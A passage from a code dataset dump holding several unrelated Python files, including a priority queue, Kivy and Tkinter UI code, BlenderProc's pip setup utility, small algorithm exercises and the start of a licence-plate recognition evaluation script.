and current_index <= self.size - 1:\n return True\n\n return False\n\n def contains(self, value):\n if self.size == 0:\n return\n else:\n if value in self.arr:\n return True\n\n return False\n\n def poll_rest(self):\n\n while self.size > 0:\n self.poll()\n\n def peek(self):\n return self.arr[0]\n\n def __str__(self):\n return f'Heap: {self.arr} & size {self.size}'\n\n\nif __name__ == '__main__':\n heapq = PriorityQueue()\n\n heapq.add(5)\n heapq.add(2)\n heapq.poll()\n print(heapq)\n heapq.add(1)\n heapq.poll()\n print(heapq)\n heapq.add(4)\n heapq.add(10)\n heapq.add(11)\n print(heapq)\n heapq.poll_rest()\n\n print('Second')\n heapq.add(5)\n heapq.add(12)\n heapq.add(8)\n heapq.poll()\n heapq.add(17)\n heapq.add(3)\n heapq.poll()\n heapq.add(7)\n heapq.add(23)\n heapq.poll()\n heapq.add(46)\n heapq.add(69)\n heapq.poll()\n heapq.poll()\n heapq.poll()\n heapq.add(1)\n heapq.poll_rest()\n","repo_name":"EashanKaushik/Data-Structures","sub_path":"08.1_priority_queue_implementation.py","file_name":"08.1_priority_queue_implementation.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20800495612","text":"import unittest\n\nfrom hamcrest import assert_that, equal_to\nimport numpy as np\nimport vectormath as vmath\n\n\nclass Vector3DShould(unittest.TestCase):\n @staticmethod\n def test_canary():\n assert_that(2 + 2, equal_to(4))\n\n @staticmethod\n def test_vector3d_as_string_is_correct():\n sut = vmath.Vector3(423747, 8142822, -8602)\n\n assert_that(str(sut), equal_to('[ 423747. 8142822. -8602.]'))\n\n @staticmethod\n def test_vector3d_xyz_are_correct():\n sut = vmath.Vector3(423747, 8142822, -8602)\n\n assert_that(sut.x, equal_to(423747))\n assert_that(sut.y, equal_to(8142822))\n assert_that(sut.z, equal_to(-8602))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mrwizard82d1/learn_vectormath","sub_path":"tests/test_vector_3.py","file_name":"test_vector_3.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74692004889","text":"\"\"\"\nAllow the simple creation of kivy UIs for arbitrary python object. The UI\nwill automatically update as the underlying python model changes, provided any\nfunction on the UI side use the \"update\" decorator.\n\"\"\"\n\nimport kivy\nkivy.require('1.7.0')\n\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.properties import StringProperty, ListProperty, ObjectProperty\nfrom kivy.event import EventDispatcher\nfrom kivy.lang import Builder\n\n\n##################\n# DATA MODEL SIDE\n##################\n\nclass DataModel(object):\n def __init__(self):\n self.a = 'This is a'\n self.b = 'This is b'\n\n @property\n def c(self):\n return self.a + '\\nand\\n' + self.b\n\n @property\n def list_d(self):\n return [self.a, self.b]\n\n##################\n# BRIDGE\n##################\n\nclass UI_DataModelMeta(type):\n def __new__(meta, name, bases, dct):\n if '_model_class' not in dct.keys():\n raise AttributeError(\"UI_DataModel must have _model_class attribute\")\n example_model = dct['_model_class']()\n # Create kivy StringProperty objects for all the attributes\n # in the underlying data model\n added_attributes = []\n for attr in dir(example_model):\n if not attr.startswith('_'):\n ##print \"Making attribute %s\" % attr\n assert attr not in dir(EventDispatcher())\n if isinstance(getattr(example_model, attr), list):\n dct[attr] = ListProperty(['INIT',])\n else:\n dct[attr] = StringProperty('INIT')\n added_attributes.append(attr)\n # Let the UI_DataModel know what attributes are from the common model\n dct['_model_attr'] = added_attributes\n return super(UI_DataModelMeta, meta).__new__(meta, name, bases, dct)\n\n\nclass UI_DataModel(EventDispatcher):\n __metaclass__ = UI_DataModelMeta\n _model_class = DataModel\n def __init__(self, parent=None):\n if parent is None:\n parent = self._model_class()\n if not isinstance(parent, self._model_class):\n raise TypeError(\"Passed data model must be of same type as _model\")\n self.__parent = parent\n# print \"Making a datamodel with parent's attributes, which are:\"\n# print '\\t' + str(self._model_attr)\n def __getattribute__(self, key):\n# print \">> Trying to get %s\" % key\n if key in ('_model_attr', '__parent', '_model_class', '_model'):\n return object.__getattribute__(self, key)\n elif key in self._model_attr:\n# print \" INTERCEPTED!\"\n # Get the value of this key from the common data model\n val = getattr(self.__parent, key)\n# print \" val or %s is %s\" % (key, val)\n # Typecase as needed\n if isinstance(val, list):\n # Construct a list of property objects\n val2 = []\n for a in val:\n # We have to create a whole new UI model for these...\n #class SubModel(UI_DataModel):\n # _model_class = type(a)\n #val2.append(SubModel(a))\n val2.append(str(a))\n else:\n val2 = str(val)\n # Invoke kivy's Property setter by setting our attribute\n setattr(self, key, val2)\n # Proceed as normal\n return EventDispatcher.__getattribute__(self, key)\n else:\n# print \" Pushing up to base class\"\n return EventDispatcher.__getattribute__(self, key)\n\n @property\n def _model(self):\n return self.__parent\n\n @_model.setter\n def _model(self, new_parent):\n if not isinstance(new_parent, self._model_class):\n raise TypeError(\"Passed data model must be of same type as _model\")\n self.__parent = new_parent\n # Update outselves\n self.update(lambda: None)()\n\n def update(self, func):\n \"\"\"Decorator to put around any UI function that update the common\n data model\"\"\"\n def wrapper(*args, **kwargs):\n # Execute function as normal\n ret = func(*args, **kwargs)\n # Update UI Data Model wrapper\n for attr in self._model_attr:\n getattr(self, attr)\n return ret\n return wrapper\n\n\n##################\n# UI SIDE\n##################\n\nBuilder.load_string(\"\"\"\n:\n cols: 2\n Label:\n text: \"Attribute a:\"\n Label:\n text: root.ui_data_model.a\n Label:\n text: \"Attribute b:\"\n Label:\n text: root.ui_data_model.b\n Label:\n text: \"Attribute c:\"\n Label:\n text: root.ui_data_model.c\n Label:\n text: \"Attribute list d[0]:\"\n Label:\n text: root.ui_data_model.list_d[0]\n Button:\n text: \"Make data_model.a longer\"\n on_press: root.button_press()\n Button:\n text: \"Make data_model.b shorter\"\n on_press: root.button_press2()\n\"\"\")\n\n\nclass RootWidget(GridLayout):\n ui_data_model = UI_DataModel(DataModel())\n\n def __init__(self, **kwargs):\n GridLayout.__init__(self, **kwargs)\n # Set up out model\n self.data_model = DataModel()\n self.ui_data_model._model = self.data_model\n\n @ui_data_model.update\n def button_press(self, *args):\n # Make sure you modify the common data model, not the UI's\n # data model wrapper\n self.data_model.a = 'This is a and it is really long now'\n ##print common_data_model.c\n ##print self.ui_data_model.c\n ##print self.ui_data_model.a\n\n @ui_data_model.update\n def button_press2(self, *args):\n self.data_model.b = 'B'\n ##print common_data_model.c\n ##print self.ui_data_model.c\n\nclass TestApp(App):\n def build(self):\n return RootWidget()\n\nif __name__ == '__main__':\n app = TestApp()\n app.run()","repo_name":"jsexauer/ItBuildsCharacter","sub_path":"kivy_app/data_model_wrapper.py","file_name":"data_model_wrapper.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"43330886600","text":"menu =\"\"\"\nBienvenidos al conversor de Monedas\n\n1 -Pesos Colombianos\n2 -Pesos Argentinos\n3 -Pesos Mexicanos\n4 -Bolivares\n\n\nELige una opcion: \"\"\"\n\ndef conversor(tipo_moneda, valor_dolar):\n pesos = input(\"¿Cuantos pesos \" + tipo_moneda +\"tienes?: \")\n pesos = float(pesos)\n dolares = pesos/valor_dolar\n dolares = round(dolares, 2)\n dolares = str(dolares)\n print(\"Tienes $\" + dolares + \"Dolares\")\nopcion = int(input(menu))\n\nif opcion == 1:\n conversor(\"Colombianos,3875\")\nelif opcion == 2:\n conversor(\"Argentina,65\")\nelif opcion == 3:\n conversor(\"Mexicanos,24\")\nelif opcion == 4:\n bolivares = input(\"¿Cuantos Bolivares tienes?: \")\n bolivares = float(bolivares)\n valor_dolar = 4.90\n dolares = bolivares/valor_dolar\n dolares = round(dolares, 2)\n dolares = str(dolares)\n print(\"Tienes $\" + dolares + \"Dolares\")\n\nelse:\n print('Ingresa una opcion correcta porfavor ')\n\n\n\n","repo_name":"DonielAcosta/python-3","sub_path":"convertidor.py","file_name":"convertidor.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34748054156","text":"\"\"\" Ensures that all necessary pip packages are installed in the blender environment. \"\"\"\n\nimport os\nimport sys\nimport tarfile\nfrom sys import platform\nimport subprocess\nimport importlib\nfrom io import BytesIO\nimport zipfile\nimport uuid\nfrom typing import List, Optional, Union, Dict\nimport json\n\nimport requests\n\nfrom blenderproc.python.utility.DefaultConfig import DefaultConfig\n\n\nclass SetupUtility:\n \"\"\"\n Setup class, ensures that all necessary pip packages are there\n \"\"\"\n # Remember already installed packages, so we do not have to call pip freeze multiple times\n installed_packages: Optional[Dict[str, str]] = None\n package_list_is_from_cache = False\n main_setup_called = False\n\n @staticmethod\n def setup(user_required_packages: Optional[List[str]] = None, blender_path: Optional[str] = None,\n major_version: Optional[str] = None, reinstall_packages: bool = False,\n debug_args: Optional[List[str]] = None) -> List[str]:\n \"\"\" Sets up the python environment.\n\n - Makes sure all required pip packages are installed\n - Prepares the given sys.argv\n\n :param user_required_packages: A list of python packages that are additionally necessary to execute the\n python script.\n :param blender_path: The path to the blender installation. If None, it is determined automatically based on\n the current python env.\n :param major_version: The version number of the blender installation. If None, it is determined automatically\n based on the current python env.\n :param reinstall_packages: Set to true, if all python packages should be reinstalled.\n :param debug_args: Can be used to overwrite sys.argv in debug mode.\n :return: List of sys.argv after removing blender specific commands\n \"\"\"\n packages_path = SetupUtility.setup_pip(user_required_packages, blender_path, major_version, reinstall_packages)\n\n if not SetupUtility.main_setup_called:\n SetupUtility.main_setup_called = True\n sys.path.append(packages_path)\n is_debug_mode = \"--background\" not in sys.argv\n\n # Setup temporary directory\n if is_debug_mode:\n SetupUtility.setup_utility_paths(\"examples/debugging/temp\")\n else:\n SetupUtility.setup_utility_paths(sys.argv[sys.argv.index(\"--\") + 2])\n\n # Only prepare args in non-debug mode (In debug mode the arguments are already ready to use)\n if not is_debug_mode:\n # Cut off blender specific arguments\n sys.argv = sys.argv[sys.argv.index(\"--\") + 1:sys.argv.index(\"--\") + 2] + \\\n sys.argv[sys.argv.index(\"--\") + 3:]\n elif debug_args is not None:\n sys.argv = [\"debug\"] + debug_args\n\n return sys.argv\n\n @staticmethod\n def setup_utility_paths(temp_dir: str):\n \"\"\" Set utility paths: Temp dir and working dir.\n\n :param temp_dir: Path to temporary directory where Blender saves output. Default is shared memory.\n \"\"\"\n # pylint: disable=import-outside-toplevel,cyclic-import\n from blenderproc.python.utility.Utility import Utility, resolve_path\n # pylint: enable=import-outside-toplevel,cyclic-import\n\n Utility.temp_dir = resolve_path(temp_dir)\n os.makedirs(Utility.temp_dir, exist_ok=True)\n\n @staticmethod\n def determine_python_paths(blender_path: Optional[str], major_version: Optional[str]) -> Union[str, str, str, str]:\n \"\"\" Determines python binary, custom pip packages and the blender pip packages path.\n\n :param blender_path: The path to the blender main folder.\n :param major_version: The major version string of the blender installation.\n :return:\n - The path to the python binary of the blender installation\n - The path to the directory containing custom pip packages installed by BlenderProc\n - The path to the directory containing pip packages installed by blender.\n \"\"\"\n # If no bleneder path is given, determine it based on sys.executable\n if blender_path is None:\n blender_path = os.path.abspath(os.path.join(os.path.dirname(sys.executable), \"..\", \"..\", \"..\"))\n major_version = os.path.basename(os.path.abspath(os.path.join(os.path.dirname(sys.executable), \"..\", \"..\")))\n\n # Based on the OS determined the three paths\n current_python_version = \"python3.10\"\n if platform in [\"linux\", \"linux2\"]:\n python_bin_folder = os.path.join(blender_path, major_version, \"python\", \"bin\")\n python_bin = os.path.join(python_bin_folder, current_python_version)\n packages_path = os.path.abspath(os.path.join(blender_path, \"custom-python-packages\"))\n packages_import_path = os.path.join(packages_path, \"lib\", current_python_version, \"site-packages\")\n pre_python_package_path = os.path.join(blender_path, major_version, \"python\", \"lib\",\n current_python_version, \"site-packages\")\n elif platform == \"darwin\":\n python_bin_folder = os.path.join(blender_path, \"..\", \"Resources\", major_version, \"python\", \"bin\")\n python_bin = os.path.join(python_bin_folder, current_python_version)\n packages_path = os.path.abspath(os.path.join(blender_path, \"custom-python-packages\"))\n packages_import_path = os.path.join(packages_path, \"lib\", current_python_version, \"site-packages\")\n pre_python_package_path = os.path.join(blender_path, \"..\", \"Resources\", major_version, \"python\",\n \"lib\", current_python_version, \"site-packages\")\n elif platform == \"win32\":\n python_bin_folder = os.path.join(blender_path, major_version, \"python\", \"bin\")\n python_bin = os.path.join(python_bin_folder, \"python\")\n packages_path = os.path.abspath(os.path.join(blender_path, \"custom-python-packages\"))\n packages_import_path = os.path.join(packages_path, current_python_version.replace(\".\", \"\").capitalize(),\n \"site-packages\")\n pre_python_package_path = os.path.join(blender_path, major_version, \"python\", \"lib\", \"site-packages\")\n else:\n raise RuntimeError(f\"This system is not supported yet: {platform}\")\n\n return python_bin, packages_path, packages_import_path, pre_python_package_path\n\n @staticmethod\n def setup_pip(user_required_packages: Optional[List[str]] = None, blender_path: Optional[str] = None,\n major_version: Optional[str] = None, reinstall_packages: bool = False,\n use_custom_package_path: bool = True, install_default_packages: bool = True) -> str:\n \"\"\"\n Makes sure the given user required and the general required python packages are installed in the BlenderProc env\n\n At the first run all installed packages are collected via pip freeze.\n If a pip packages is already installed, it is skipped.\n\n :param user_required_packages: A list of pip packages that should be installed. The version number can be\n specified via the usual == notation.\n :param blender_path: The path to the blender installation.\n :param major_version: The version number of the blender installation.\n :param reinstall_packages: Set to true, if all python packages should be reinstalled.\n :param use_custom_package_path: If True, the python packages are installed into a custom folder, separate\n from blenders own python packages.\n :param install_default_packages: If True, general required python packages are made sure to be installed.\n :return: Returns the path to the directory which contains all custom installed pip packages.\n \"\"\"\n required_packages = []\n # Only install general required packages on first setup_pip call\n if SetupUtility.installed_packages is None and install_default_packages:\n required_packages += DefaultConfig.default_pip_packages\n if user_required_packages is not None:\n required_packages += user_required_packages\n\n if reinstall_packages:\n raise ValueError(\"The reinstall package mode is not supported right now!\")\n\n result = SetupUtility.determine_python_paths(blender_path, major_version)\n python_bin, packages_path, packages_import_path, pre_python_package_path = result\n\n # Init pip\n SetupUtility._ensure_pip(python_bin, packages_path, packages_import_path, pre_python_package_path)\n\n # If the list of installed packages was read from cache\n if SetupUtility.package_list_is_from_cache:\n # Check if there would be any pip package updates based on the cache\n found_package_to_install = SetupUtility._pip_install_packages(required_packages, python_bin,\n packages_path, dry_run=True)\n # If yes, reload the list of installed packages\n if found_package_to_install:\n SetupUtility._ensure_pip(python_bin, packages_path, packages_import_path,\n pre_python_package_path, force_update=True)\n\n packages_were_installed = SetupUtility._pip_install_packages(required_packages, python_bin,\n packages_path,\n use_custom_package_path=use_custom_package_path)\n\n # Make sure to update the pip package list cache, if it does not exist or changes have been made\n cache_path = os.path.join(packages_path, \"installed_packages_cache_v2.json\")\n if packages_were_installed or not os.path.exists(cache_path):\n with open(cache_path, \"w\", encoding=\"utf-8\") as f:\n json.dump(SetupUtility.installed_packages, f)\n\n # If packages were installed, invalidate the module cache, s.t. the new modules can be imported right away\n if packages_were_installed:\n importlib.invalidate_caches()\n return packages_import_path\n\n @staticmethod\n def _pip_install_packages(required_packages, python_bin, packages_path, reinstall_packages: bool = False,\n dry_run: bool = False, use_custom_package_path: bool = True) -> bool:\n \"\"\" Installs the list of given pip packages in the given python environment.\n\n :param required_packages: A list of pip packages that should be installed. The version number can be\n specified via the usual == notation.\n :param python_bin: Path to python binary.\n :param packages_path: Path where our pip packages should be installed\n :param reinstall_packages: Set to true, if all python packages should be reinstalled.\n :param dry_run: If true, nothing will be installed, and it will only be checked whether there are\n any potential packages to update/install.\n :param use_custom_package_path: If True, the python packages are installed into a custom folder,\n separate from blenders own python packages.\n :return: Returns True, if any packages were update/installed or - if dry_run=True - if there are any potential\n packages to update/install.\n \"\"\"\n # Install all packages\n packages_were_installed = False\n for package in required_packages:\n # If -f (find_links) flag for pip install in required package set find_link = link to parse\n find_link = None\n\n # Extract name and target version\n if \"==\" in package:\n package_name, package_version = package.lower().split('==')\n if ' -f ' in package_version:\n find_link = package_version.split(' -f ')[1].strip()\n package_version = package_version.split(' -f ')[0].strip()\n else:\n package_name, package_version = package.lower(), None\n\n if package_name == \"opencv-python\":\n raise RuntimeError(\"Please use opencv-contrib-python instead of opencv-python, as having both \"\n \"packages installed in the same environment can lead to complications.\")\n\n # If the package is given via git, extract package name from url\n if package_name.startswith(\"git+\"):\n # Extract part after last slash\n package_name = package_name[package_name.rfind(\"/\") + 1:]\n # Replace underscores with dashes as it's done by pip\n package_name = package_name.replace(\"_\", \"-\")\n\n # Check if package is installed\n # pylint: disable=unsupported-membership-test\n already_installed = package_name in SetupUtility.installed_packages\n # pylint: enable=unsupported-membership-test\n\n # If version check is necessary\n if package_version is not None and already_installed:\n # Check if the correct version is installed\n # pylint: disable=unsubscriptable-object\n already_installed = package_version == SetupUtility.installed_packages[package_name]\n # pylint: enable=unsubscriptable-object\n\n # Only install if it's not already installed (pip would check this itself, but at first downloads the\n # requested package which of course always takes a while)\n if not already_installed or reinstall_packages:\n print(f\"Installing pip package {package_name} {package_version}\")\n extra_args = []\n # Set find link flag, if required\n if find_link:\n extra_args.extend([\"-f\", find_link])\n package = package_name + \"==\" + package_version\n # If the env var is set, disable pip cache\n if os.getenv(\"BLENDER_PROC_NO_PIP_CACHE\", 'False').lower() in ('true', '1', 't'):\n extra_args.append(\"--no-cache-dir\")\n\n if not dry_run:\n if use_custom_package_path:\n extra_args.extend([\"--user\"])\n # Run pip install\n # pylint: disable=consider-using-with\n subprocess.Popen([python_bin, \"-m\", \"pip\", \"install\", package, \"--upgrade\"] + extra_args,\n env=dict(os.environ, PYTHONNOUSERSITE=\"0\", PYTHONUSERBASE=packages_path)).wait()\n # pylint: enable=consider-using-with\n # pylint: disable=unsupported-assignment-operation\n SetupUtility.installed_packages[package_name] = package_version\n # pylint: enable=unsupported-assignment-operation\n packages_were_installed = True\n else:\n return True\n\n return packages_were_installed\n\n @staticmethod\n def uninstall_pip_packages(package_names: List[str], blender_path: str, major_version: str):\n \"\"\" Uninstalls the given pip packages in blenders python environment.\n\n :param package_names: A list of pip packages that should be uninstalled.\n :param blender_path: The path to the blender main folder.\n :param major_version: The major version string of the blender installation.\n \"\"\"\n # Determine python and packages paths\n python_bin, _, packages_import_path, _ = SetupUtility.determine_python_paths(blender_path, major_version)\n\n # Run pip uninstall\n # pylint: disable=consider-using-with\n subprocess.Popen([python_bin, \"-m\", \"pip\", \"uninstall\"] + package_names,\n env=dict(os.environ, PYTHONPATH=packages_import_path)).wait()\n # pylint: enable=consider-using-with\n\n # Clear installed packages cache\n SetupUtility.clean_installed_packages_cache(blender_path, major_version)\n\n @staticmethod\n def _ensure_pip(python_bin: str, packages_path: str, packages_import_path: str,\n pre_python_package_path: str, force_update: bool = False):\n \"\"\" Make sure pip is installed and read in the already installed packages\n\n :param python_bin: Path to python binary.\n :param packages_path: Path where our pip packages should be installed\n :param packages_import_path: Path to site-packages in packages_path which contains the installed packages\n :param pre_python_package_path: Path that contains blender's default pip packages\n :param force_update: If True, the installed-packages-cache will be ignored and will be recollected based\n on the actually installed packages.\n \"\"\"\n if SetupUtility.installed_packages is None:\n if not force_update:\n cache_path = os.path.join(packages_path, \"installed_packages_cache_v2.json\")\n if os.path.exists(cache_path):\n with open(cache_path, \"r\", encoding=\"utf-8\") as f:\n SetupUtility.installed_packages = json.load(f)\n SetupUtility.package_list_is_from_cache = True\n return\n\n SetupUtility.installed_packages = {}\n # pylint: disable=consider-using-with\n subprocess.Popen([python_bin, \"-m\", \"ensurepip\"], env=dict(os.environ, PYTHONPATH=\"\")).wait()\n # Make sure pip is up-to-date\n subprocess.Popen([python_bin, \"-m\", \"pip\", \"install\", \"--upgrade\", \"pip\"],\n env=dict(os.environ, PYTHONPATH=\"\")).wait()\n # pylint: enable=consider-using-with\n\n # Make sure to not install into the default site-packages path, as this would overwrite\n # already pre-installed packages\n if not os.path.exists(packages_path):\n os.mkdir(packages_path)\n\n # Collect already installed packages by calling pip list (outputs: ==)\n installed_packages = subprocess.check_output([python_bin, \"-m\", \"pip\", \"list\", \"--format=freeze\",\n f\"--path={pre_python_package_path}\"])\n installed_packages += subprocess.check_output([python_bin, \"-m\", \"pip\", \"list\", \"--format=freeze\",\n f\"--path={packages_import_path}\"])\n\n # Split up strings into two lists (names and versions)\n installed_packages_name, installed_packages_versions = zip(*[str(line).lower().split('==')\n for line in installed_packages.splitlines()])\n installed_packages_name = [ele[2:] if ele.startswith(\"b'\") else ele\n for ele in installed_packages_name]\n installed_packages_versions = [ele[:-1] if ele.endswith(\"'\") else ele\n for ele in installed_packages_versions]\n SetupUtility.installed_packages = dict(zip(installed_packages_name, installed_packages_versions))\n SetupUtility.package_list_is_from_cache = False\n\n @staticmethod\n def clean_installed_packages_cache(blender_path, major_version):\n \"\"\" Removes the json file containing a list of all installed pip packages (if it exists).\n\n :param blender_path: The path to the blender main folder.\n :param major_version: The major version string of the blender installation.\n \"\"\"\n _, packages_path, _, _ = SetupUtility.determine_python_paths(blender_path, major_version)\n cache_path = os.path.join(packages_path, \"installed_packages_cache_v2.json\")\n if os.path.exists(cache_path):\n os.remove(cache_path)\n\n @staticmethod\n def extract_file(output_dir: str, file: Union[str, BytesIO], mode: str = \"ZIP\"):\n \"\"\" Extract all members from the archive into output_dir.\n\n :param output_dir: The output directory that should contain the extracted files.\n :param file: The path to the archive which should be extracted.\n :param mode: The type of the given file, has to be in [\"TAR\", \"ZIP\"]\n \"\"\"\n try:\n if mode.lower() == \"zip\":\n with zipfile.ZipFile(file) as tar:\n tar.extractall(str(output_dir))\n elif mode.lower() == \"tar\":\n with tarfile.open(file) as tar:\n tar.extractall(str(output_dir))\n else:\n raise RuntimeError(f\"No such mode: {mode}\")\n\n except (IOError, zipfile.BadZipfile) as e:\n print(f\"Bad zip file given as input. {e}\")\n raise e\n\n @staticmethod\n def extract_from_response(output_dir: str, response: requests.Response):\n \"\"\" Extract all members from the archive to output_dir\n\n :param output_dir: the dir to zip file extract to\n :param response: the response to a requested url that contains a zip file\n \"\"\"\n file = BytesIO(response.content)\n SetupUtility.extract_file(output_dir, file)\n\n @staticmethod\n def check_if_setup_utilities_are_at_the_top(path_to_run_file: str):\n \"\"\"\n Checks if the given python scripts has at the top an import to SetupUtility, if not an\n exception is thrown. With an explanation that each python script has to start with SetupUtility.\n\n :param path_to_run_file: path to the used python script\n \"\"\"\n if os.path.exists(path_to_run_file):\n with open(path_to_run_file, \"r\", encoding=\"utf-8\") as file:\n text = file.read()\n lines = [l.strip() for l in text.split(\"\\n\")]\n lines = [l for l in lines if l and not l.startswith(\"#\")]\n for index, line in enumerate(lines):\n if \"import blenderproc\" in line or \"from blenderproc\" in line:\n return\n code = \"\\n\".join(lines[:index + 2])\n raise RuntimeError(f'The given script \"{path_to_run_file}\" does not have a blenderproc '\n f'import at the top! Make sure that is the first thing you import, as '\n f'otherwise the import of third-party packages installed in the '\n f'blender environment will fail.\\n'\n f'Your code:\\n#####################\\n{code}\\n\"'\n f'\"####################\\nReplaces this with:\\n\"'\n f'\"import blenderproc as bproc\"')\n else:\n raise RuntimeError(f\"The given run script does not exist: {path_to_run_file}\")\n\n @staticmethod\n def determine_temp_dir(given_temp_dir: str) -> str:\n \"\"\" Finds and creates a temporary directory.\n\n On linux the temp dir is per default placed in /dev/shm or /tmp.\n The name of the created temp dir contains a uuid, so multiple BlenderProc processes\n can run on one system.\n\n :param given_temp_dir: A directory inside which the temp dir should be created\n :return: The path to the created temp dir.\n \"\"\"\n # Determine perfect temp dir\n if given_temp_dir is None:\n if sys.platform != \"win32\":\n if os.path.exists(\"/dev/shm\"):\n temp_dir = \"/dev/shm\"\n else:\n temp_dir = \"/tmp\"\n else:\n temp_dir = os.getenv(\"TEMP\")\n else:\n temp_dir = given_temp_dir\n # Generate unique directory name in temp dir\n temp_dir = os.path.join(temp_dir, \"blender_proc_\" + str(uuid.uuid4().hex))\n # Create the temp dir\n print(\"Using temporary directory: \" + temp_dir)\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n return temp_dir\n","repo_name":"DLR-RM/BlenderProc","sub_path":"blenderproc/python/utility/SetupUtility.py","file_name":"SetupUtility.py","file_ext":"py","file_size_in_byte":24307,"program_lang":"python","lang":"en","doc_type":"code","stars":2296,"dataset":"github-code","pt":"31"} +{"seq_id":"1328077796","text":"import datetime\n\nfrom reports.models import Report\nfrom rest_framework.serializers import ModelSerializer\n\n\nclass ReportsSerializer(ModelSerializer):\n class Meta:\n model = Report\n exclude = ('is_delete', 'update_time')\n extra_kwargs = {\n 'html': {\n 'write_only': True,\n },\n 'create_time': {\n 'read_only': True\n }\n }\n\n def create(self, validated_data):\n name = validated_data['name']\n validated_data['name'] = name + '_' + datetime.datetime.now().strftime('%Y%m%d%H%M%s')\n report = Report.objects.create(**validated_data)\n report.save()\n return report\n","repo_name":"DeltaFarce/LaatAPI","sub_path":"apps/reports/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29028395836","text":"Matrice = []\n\ndef controllaMatriceNonogram(lrighe,lcolonne):\n m = len(Matrice)\n\n # Scansione righe\n for i in range(m):\n cellerighe = lrighe[i]\n for j in range(m):\n if (Matrice[i][j] == 1):\n cellerighe -= 1\n \n if (cellerighe != 0):\n return False\n\n # Scansione Colonne\n for i in range(m):\n cellecolonne = lcolonne[i]\n for j in range(m):\n if (Matrice[j][i] == 1):\n cellecolonne -= 1\n \n if (cellecolonne != 0):\n return False\n\n return True\n \n\ndef main():\n n = int(input())\n\n for i in range(n):\n riga = []\n for j in range(n):\n riga.append(int(input()))\n Matrice.append(riga)\n\n ListaNumsColonna = []\n for i in range(n):\n ListaNumsColonna.append(int(input()))\n \n ListaNumsRiga = []\n for i in range(n):\n ListaNumsRiga.append(int(input()))\n\n if(controllaMatriceNonogram(ListaNumsRiga, ListaNumsColonna)):\n print(\"SI\", end='')\n else:\n print(\"NO\", end='')\n\nmain()","repo_name":"gabrielegrillo/Fondamenti1-Unical","sub_path":"E2.py","file_name":"E2.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27329682355","text":"class Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n if not s:\n return [[]]\n res = []\n for i in range(len(s)):\n if self.recur(s[:i+1]):\n for j in self.partition(s[i+1:]):\n res.append([s[:i+1]]+j)\n return res\n def recur(self,s):\n return s[::-1] == s\n \n #method 2\nclass Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n n = len(s)\n \n is_palindrome = [[0 for j in xrange(n)] for i in xrange(n)]\n for i in reversed(xrange(0, n)):\n for j in xrange(i, n):\n is_palindrome[i][j] = s[i] == s[j] and ((j - i < 2 ) or is_palindrome[i + 1][j - 1])\n \n sub_partition = [[] for i in xrange(n)]\n for i in reversed(xrange(n)):\n for j in xrange(i, n):\n if is_palindrome[i][j]:\n if j + 1 < n:\n for p in sub_partition[j + 1]:\n sub_partition[i].append([s[i:j + 1]] + p)\n else:\n sub_partition[i].append([s[i:j + 1]])\n \n return sub_partition[0]\n","repo_name":"PrinceNathaniel/leetcode","sub_path":"131Palinddrome-partitioning.py","file_name":"131Palinddrome-partitioning.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70441682328","text":"#!/usr/bin/env python3\nimport random \n\nanswer = random.randint(1, 100)\ncounter = 0\nwhile True:\n counter += 1\n number = int(input('Please enter a number: '))\n if number < answer:\n print('Please enter bigger number.')\n elif number > answer:\n print('Please enter smaller number.')\n else:\n print('Congratulations!')\n break\nprint('You guessed {} times in total'.format(counter))\nif counter > 7:\n print('Your IQ balance is clearly insufficient')\n","repo_name":"Yao-Phoenix/day_code","sub_path":"_random.py","file_name":"_random.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37922891598","text":"import tkinter as tk\n\nfrom ui.window.main.title.TitleText import TitleText\nfrom ui.consts.ColorConsts import ColorConsts\n\nclass TitleFrame(tk.Frame):\n def __init__(self, window: tk.Tk, master: tk.Widget) -> None:\n super().__init__(\n master,\n background = ColorConsts.MEDIUM_GREY,\n height = 1,\n pady = 25\n )\n self.window = window\n self.text = TitleText(self.window, self)\n self.pack(fill = tk.X)","repo_name":"wjrm500/Pawnfork","sub_path":"ui/window/main/TitleFrame.py","file_name":"TitleFrame.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75023149846","text":"import model.alpr as alpr\nimport argparse\nimport os\nimport pandas as pd\nimport editdistance\nfrom sklearn.metrics import accuracy_score\n\n#### argument parsing ####\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataPath', required=True, help='path to training dataset')\nparser.add_argument('--savePath', required=True, help='path to save results')\nparser.add_argument('--crnnPath', required=True, help='path to pre-trained CRNN model')\nparser.add_argument('--ctcDecoder', type=str, default='bestPath', \n choices=['bestPath', 'beamSearch'],\n help='method for decoding ctc outputs')\n\nparser.add_argument('--normalise', type=bool, default=False, \n help='set true to normalise posterior probability.')\n\nopt = parser.parse_args()\nprint(opt)\n\nif not os.path.exists(opt.savePath):\n os.makedirs(opt.savePath)\n\n\n#### load model ####\nlpr = alpr.AutoLPR(decoder=opt.ctcDecoder, 